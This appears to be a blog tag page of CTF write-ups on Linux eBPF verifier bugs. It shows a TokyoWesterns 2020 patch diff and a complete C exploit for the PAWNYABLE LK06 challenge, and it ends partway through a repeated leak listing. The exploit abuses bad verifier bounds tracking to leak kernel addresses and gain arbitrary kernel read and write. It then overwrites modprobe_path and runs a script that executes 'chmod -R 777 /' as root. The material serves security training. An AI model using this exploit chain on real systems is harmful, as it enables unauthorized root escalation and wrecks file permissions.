Posts for: #EBPF

TokyoWesternsCTF2020 eebpf


Problem

Environment

  • kernel version: 5.4.58
  • unprivileged_bpf_disabled: 0

Patch file

The important part is the following:

      diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
< #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
< struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
< {
< 	if (insn_bitness == 32)
< 		//Never reach here now.
< 		return TNUM((u32)(((s32)a.value) << min_shift),
< 			    (u32)(((s32)a.mask)  << min_shift));
< 	else
< 		return TNUM((s64)a.value << min_shift,
< 			    (s64)a.mask  << min_shift);
< }
< 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
< 	case BPF_ALSH:
< 		if (umax_val >= insn_bitness) {
< 			/* Shifts greater than 31 or 63 are undefined.
< 			 * This includes shifts by a negative number.
< 			 */
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		}
< 
< 		/* Upon reaching here, src_known is true and
< 		 * umax_val is equal to umin_val.
< 		 */
< 		if (insn_bitness == 32) {
< 			//Now we don't support 32bit. Cuz im too lazy.
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		} else {
< 			dst_reg->smin_value <<= umin_val;
< 			dst_reg->smax_value <<= umin_val;
< 		}
< 
< 		dst_reg->var_off = tnum_alshift(dst_reg->var_off, umin_val,
< 						insn_bitness);
< 
< 		/* blow away the dst_reg umin_value/umax_value and rely on
< 		 * dst_reg var_off to refine the result.
< 		 */
< 		dst_reg->umin_value = 0;
< 		dst_reg->umax_value = U64_MAX;
< 		__update_reg_bounds(dst_reg);
< 		break;

And the related location is the following:

Read more →

PAWNYABLE LK06: Brahman


LK06: Brahman

Exploit using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

// Show a prompt, then pause until a byte (or EOF) arrives on stdin.
// Used for interactive debugging of the exploit.
void get_enter_to_continue(const char* msg) {
  puts(msg);
  (void)getchar();
}

// Print msg plus the current errno description and abort the exploit.
// Note: exit(-1) reaches the shell as status 255.
void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

// Thin wrapper around the raw bpf(2) syscall (no libbpf in this environment).
// Returns the syscall result: >= 0 on success, -1 with errno set on failure.
int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

// Create a BPF_MAP_TYPE_ARRAY map with 4-byte int keys.
// Returns the new map fd; terminates the process on failure.
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  const int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
// Store *pval into map slot `key` (BPF_ANY: create or overwrite).
// Returns the bpf(2) result; terminates the process on failure.
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  const int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
// Read map slot `key` into *pval.
// Returns the raw bpf(2) result (0 on success, -1 on failure) — unlike the
// other wrappers, callers are expected to check it themselves.
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,  // flags are not used by BPF_MAP_LOOKUP_ELEM
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// fd of the BPF array map shared by all exploit helpers; created in main().
int mapfd = -1;
// Leak the kernel address of our struct bpf_map.
// The map element holds 0, so at runtime r1 ends up as 1 (the low 32 bits
// of 0xfffffffe00000001 after BPF_MOV32), but the patched verifier (missing
// __mark_reg32_known after BPF_OR) tracks inconsistent 32-bit bounds for it
// (see inline tnum comments).  That lets `r0 = map_elem_ptr + r1` pass
// verification, and the resulting kernel pointer is stored back into the
// map where userspace can read it.  The element appears to sit 0x110 bytes
// into struct bpf_map (per the final `- 1 - 0x110` and main()'s printf) —
// kernel-version dependent; confirm against the target.
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  // Attach the filter to one end of a socketpair and send any packet
  // through the other end to trigger it once.
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

// Arbitrary 8-byte kernel write (AAW).
// Packet layout written to the socket: { marker, addr, val }.
// Using the same verifier bug as leak_bpf_map_addr(), r8 is built so that
// its runtime value is 1 while the verifier tracks it as a constant (see
// the tnum comments below).  The first skb_load_bytes() therefore copies
// 0x10 runtime bytes into fp-0x20 — overwriting the pointer spilled at
// fp-0x18 with `addr` from the packet — while the verifier believes the
// spill slot is untouched.  The second skb_load_bytes() then copies `val`
// (packet offset 0x10, 8 bytes) straight to that kernel address.
// Returns buf[0] (the constant marker) — callers ignore the return value.
uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Trigger the filter: the packet carries the target address and value.
  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
// Arbitrary 8-byte kernel read (AAR).
// Packet layout written to the socket: { marker, addr }.
// As in aaw64(), the first skb_load_bytes() writes 0x10 runtime bytes
// (verifier-tracked as fewer) into fp-0x20, replacing the pointer spilled
// at fp-0x18 with `addr` from the packet.  That pointer is then passed as
// the value argument to map_update_elem(), which copies 8 bytes from
// `addr` into our map element; userspace reads it back via
// bpf_map_lookup().  Returns the 8 bytes read from `addr`.
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = r6 (map elem ptr).
                           // NOTE(review): unlike aaw64 this spills r6, not
                           // arg3 — the skb_load_bytes below overwrites this
                           // slot with `addr` either way.
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Trigger the filter, then fetch the bytes it copied into the map.
  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

// Kernel address of our struct bpf_map, filled in by leak_bpf_map_addr().
uint64_t bpf_map_addr = 0;

// Exploit driver: leak KASLR, overwrite modprobe_path, trigger modprobe.
int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  // Step 1: leak the kernel address of our struct bpf_map.
  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  // Step 2: read the map's ops pointer (array_map_ops) to derive the base.
  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  // Step 3: overwrite modprobe_path with our script, 8 bytes at a time.
  const char* new_modprobe = "/tmp/evil.sh";
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf("[*] Overwrite modprobe to %s\n", new_modprobe);
  // Stage the path in a zero-padded, 8-byte-aligned buffer first.  The old
  // loop read the string literal directly via *(uint64_t*): an out-of-bounds
  // (and potentially misaligned) read past the 13-byte literal, and it did
  // not guarantee the NUL terminator landed in the kernel.  Copying
  // new_modprobe_len + 1 bytes and rounding up to whole words fixes both.
  uint64_t scratch[0x10] = {0};
  memcpy(scratch, new_modprobe, new_modprobe_len + 1);
  for (size_t i = 0; i < (new_modprobe_len + 1 + 7) / 8; i++) {
    aaw64(kernel_base + MODPROB_OFFSET + i * 8, scratch[i]);
  }
  {
    // Verify the overwrite through the procfs view of modprobe_path.
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd < 0) {
      fatal("open(/proc/sys/kernel/modprobe)");
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    close(fd);  // was leaked before
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf("[*] new modprobe: %s\n", modprobe);
      puts("[-] Failed to overwrite modprobe");
      return -1;
    }
    puts("[+] Successfully overwritten modprobe");
  }

  // Step 4: exec a file with an unknown magic so the kernel invokes
  // modprobe_path (now /tmp/evil.sh) with full privileges.
  puts("[+] Get root");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn");

  return 0;
}

Leaks

Leak addr of struct bpf_map using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

// Show a prompt and block on stdin — debugging aid.
void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

// Print msg plus the current errno description and abort the exploit.
void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

// Thin wrapper around the raw bpf(2) syscall.
int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

// Create a BPF_MAP_TYPE_ARRAY map with int keys; dies on failure.
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
// Store *pval into map slot `key` (BPF_ANY); dies on failure.
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
// Read map slot `key` into *pval; returns the raw bpf(2) result
// (callers check it themselves).  flags are ignored by lookup.
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// fd of the BPF array map shared by all exploit helpers; created in main().
int mapfd = -1;
// Leak the kernel address of our struct bpf_map.
// The map element holds 0, so at runtime r1 ends up as 1 (low 32 bits of
// 0xfffffffe00000001 after BPF_MOV32), while the patched verifier (missing
// __mark_reg32_known after BPF_OR) tracks inconsistent 32-bit bounds for
// it (see inline tnum comments).  `r0 = map_elem_ptr + r1` thus passes
// verification; the kernel pointer is written back into the map and read
// from userspace.  The `- 1 - 0x110` undoes the +1 and steps back from the
// element to the start of struct bpf_map (offset per this kernel version).
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
